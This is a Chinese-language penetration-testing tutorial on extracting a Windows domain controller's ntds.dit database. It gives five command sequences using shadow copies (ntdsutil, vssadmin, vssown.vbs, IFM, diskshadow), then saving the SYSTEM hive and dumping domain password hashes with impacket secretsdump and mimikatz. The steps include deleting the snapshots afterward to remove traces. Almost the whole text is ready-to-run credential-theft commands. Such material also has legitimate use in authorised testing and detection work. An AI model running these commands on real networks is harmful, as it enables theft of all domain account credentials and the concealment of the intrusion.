内网渗透：域控制器安全

Delina

原文链接：内网渗透：域控制器安全
​
内网渗透：域控制器安全

​

提取ntds.dit：
ntds.dit作用：
保存了所有目录活动数据，可以破译进行hash获取制作票据
方法一：通过ntdsutil.exe提取ntds.dit
指令：
ntdsutilsnapshot "activate instance ntds" create quit quit
1.创建快照保存其中GUID值
{351d4f2c-7eed-431c-be9a-33f60df84733}

​

2.加载快照
指令：

• 
  

ntdsutil snapshot "mount {351d4f2c-7eed-431c-be9a-33f60df84733}"quit quit
这一步可以看到被加载到哪一个目录下

​

3.将ntds.dit复制出来
指令：

• 
  

copy C:\$SNAP_202201071706_VOLUMEC$\Windows\NTDS\ntds.dit C:\Users\liukaifeng01\Desktop

​

4.卸载删除创建的快照，擦屁股

• 
  

ntdsutil snapshot "unmount {77c51a1b-69fa-4a51-a801-95671fa92fd3}""delete {77c51a1b-69fa-4a51-a801-95671fa92fd3}" quit quit

​

5.确认删除，提裤子

• 
  

ntdsutil snapshot "List All" quit quit

​

方法二：vssadmin提取ntds.dit
1.创建c盘卷影拷贝
指令：

• 
  

vssadmin create shadow /for=c:
​
2.在创建的卷影里将ntds.dit复制出来
指令：

• 
  

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\NTDS\ntds.dit c:\ntds.dit

​

3.删除创建的卷影
指令：

• 
  

vssadmin delete shadows /for=c: /quiet

​

方法三：利用 vssown.vbs脚本提取
1.启动拷贝卷影的服务

• 
  

cscript vssown.vbs /start

​

2.创建c盘卷影

• 
  

cscript vssown.vbs /create c

​

3.列出当前的拷贝卷影

• 
  

cscript vssown.vbs /list

​

​​
4.拷贝出文件

• 
  

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\windows\NTDS\ntds.dit c:\ntds.dit

​

5.删除卷影

• 
  

cscript vssown.vbs /delete {3D20A65B-9BF8-426A-A15A-92BC04879EF7}//GUID

​

方法四：利用ntdsutilIFM功能创建卷影拷贝
1.创建IFM媒体
指令：

• 
  

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

​

2.将ntds.dit和system复制到目录下
指令：
dir "c:\test\Active Directory"
dir "c:\test\registry"

​

3.复制出ntds文件删除test文件夹
指令：

• 
  

rmdir /s /q test

​

4.可以利用nishang的脚本进行复制
指令：
Import-Module.\Copy-VSS.ps1
Copy-vss

​

​

方法五：diskshadow导出ntds.dit文件
这是微软自带的软件，可以执行txt里的指令
指令：

• 
  

diskshadow /s c:\1.txt
TXT内容：

1. set context persistent nowriters
   
2. addvolume c: alias someAlias
   
3. create
   
4. expose %someAlias% k:
   
5. exec "cmd.exe" /c copy K:\Windows\NTDS\ntds.dit c:\ntds.dit
   
6. delete shadows all
   
7. list shadows all
   
8. reset
   
9. exit

复制代码

​

再将system.hive提取

• 
  

regsave hklm\system c:\windows\temp\system.hive

​

导出ntds.dit的散列值：
方法一：使用 impacket包导出
前提：导出ntds.dit必须要有system文件
指令：
impacket-secretsdump-system SYSTEM -ntds ntds.dit LOCAL

​

方法二：mimikatz获取域散列值
指令：
privilege::debug
lsadump::lsa/inject

​

​